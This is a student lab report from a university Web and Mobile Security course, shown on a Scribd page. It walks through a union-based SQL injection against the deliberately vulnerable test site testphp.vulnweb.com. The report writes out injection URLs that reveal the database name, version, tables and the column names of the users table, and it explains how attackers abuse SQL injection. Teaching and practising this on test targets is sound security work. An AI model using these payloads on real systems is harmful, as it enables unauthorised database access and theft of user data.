Scribd Logo
Upload

Welcome to Scribd!

  • Wms 2.1

    Uploaded by

    War Lock
    67 views10 pages
    The document is a lab report submitted by Akshat Chauhan for their Web and Mobile Security lab course. It details an experiment on working with SQL injection attacks. The steps demonstrate launching a SQL injection attack against a vulnerable web application to extract information like the database name, table names, and column names. The student was able to successfully retrieve data from the users table to penetrate further inside and learn about SQL injection techniques.

    Original Description:

    Original Title

    wms 2.1

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document is a lab report submitted by Akshat Chauhan for their Web and Mobile Security lab course. It details an experiment on working with SQL injection attacks. The steps demonstrate launching a SQL injection attack against a vulnerable web application to extract information like the database name, table names, and column names. The student was able to successfully retrieve data from the users table to penetrate further inside and learn about SQL injection techniques.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    67 views10 pages

    Wms 2.1

    Uploaded by

    War Lock
    The document is a lab report submitted by Akshat Chauhan for their Web and Mobile Security lab course. It details an experiment on working with SQL injection attacks. The steps demonstrate launching a SQL injection attack against a vulnerable web application to extract information like the database name, table names, and column names. The student was able to successfully retrieve data from the users table to penetrate further inside and learn about SQL injection techniques.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 10

    WEB & MOBILE SECURITY LAB

    20CSP-338
    Submitted for the requirement of

    Lab Course

    Bachelor Degree of Engineering

    COMPUTER SCIENCE & ENGINEERING

    Submitted to: Submitted By:


    Er. Jayesh Surana Akshat Chauhan
    20BCS5931

    DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING


    CHANDIGARH UNIVERSITY, GHARUAN
    August-December 2022
    LAB INDEX

    NAME: Akshat Chauhan UID: 20BCS5931


    SUBJECT NAME: WMS Lab SUBJECT CODE: 20CSP-338
    Class/Section: 619/A

    Sr. Program Date Evaluation Sign


    No LW VV FW Total
    (12) (8) (10) (30)
    1. Identify Http packet on a monitoring tool like 09/08/2022
    Wireshark.

    2. Design a method to stimulate the html injection and 16/08/2022


    cross site scripting to exploit the attackers.

    3. Understand How to find CSRF Vulnerability. 28/08/2022

    4. Working of the SQL Injection attack. 29/09/2022

    ii
    Akshat Chauhan
    20BCS5931
    Experiment-2.1

    1. AIM/OVERVIEW OF THE PRACTICAL:

    Working of the SQL injection attack.

    2. Objective:

    SQL Injection attack from command line (URL).

    3. TOOLS TO BE USED:

    (i) SQLMAP
    (ii) Acunetix
    (iii) Windows 7

    Introduction: SQL Injection (SQLi) is a type of an injection attack that makes it possible
    to execute malicious SQL statements. These statements control a database server behind a
    web application. Attackers can be use SQL Injection vulnerabilities to bypass application
    security measures. They can go around authentication and authorization of a web page or
    web application and retrieve the content of the entire SQL database. They can also use SQL
    Injection to add, modify, and delete records in the database.

    How and why is an SQL Injection Attack Performed


    • Attackers can use SQL Injection to find the credentials of other users in the database.
    They can then impersonate these users. The impersonated user may be a database
    administrator with all database privileges.
    • SQL also lets you alter data in database and add new data. For example, in a
    financial application, an attacker could use SQL Injection to alter balancer, void
    transactions, or transfer money to their account.
    • You can use SQL to delete records from a database, even drop tables. Even if the
    administrator make database backups, deletion of data could affect application
    availability until the database is restored. Also, backups may not cover the most
    ii
    Akshat Chauhan
    20BCS5931
    recent data.
    • In some database servers, you can access the operating system using the
    database server. This may be intentional or accidental. In such case, an
    attacker could use an SQL Injection as the initial vector and then attack the
    internal network behind a firewall.

    4. STEPS FOR EXPERIMENT:

    • Open the given below targeted URL in the browser. http://testphp.vulnweb.com/

    • Go to http://testphp.vulnweb.com/listproducts.php?cat=1

    ii
    Akshat Chauhan
    20BCS5931
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    EXPERIMENT-1.4

    Aim: Working of SQL injection attack.

    Requirements: PC with Windows 7 or above.

    Steps for the experiment: HTML injection

    1. Open the given below targeted URL in the browser. http://testphp.vulnweb.com/

    2. Go to http://testphp.vulnweb.com/listproducts.php?cat=1

    1
    Akshat Chauhan
    20BCS5931
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    3. You'll inject the malicious code http://testphp.vulnweb.com/listproducts.php?cat=-1’

    4. Put the random number, http://testphp.vulnweb.com/listproducts.php?cat=-1 order by


    11 clauses to check the row (tuple).
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    5. Information gathering
    ● To check the database name, Go to
    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
    1,2,3,4,5,6,7,8,9,10, database()—

    Akshat Chauhan
    3 20BCS5931
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    ● To check the database version, Go to


    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
    1,2,3,4,5,6,7,8,9,10, version()—

    6. Information to be fetch ● Table name:


    http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,
    4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables
    %20where%20table_schema=database()--
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    ● Column name:
    http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,
    4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.col
    umns%20where%20table_name= 0x7573657273

    Output:

    In the above screenshots you can see we have got an error message which means the running
    site is infected by SQL injection. Maybe we can get some important data from the users' table,
    so let’s penetrate more inside. Again Use the Concat function for table users for retrieving its
    entire column names. We successfully retrieve all eight column names from inside the table
    users.

    Learning outcomes (What I have learnt):

    1. Detect SQL Injection


    2. SQL Injection Techniques
    3. Launch a SQL Injection Attack from the command line (URL).
    DEPARTMENT OF
    COMPUTER SCIENCE & ENGINEERING

    Evaluation Grid (To be created per the SOP and Assessment guidelines):

    Sr. No. Parameters Marks Obtained Maximum Marks


    1.
    2.
    3.

    You might also like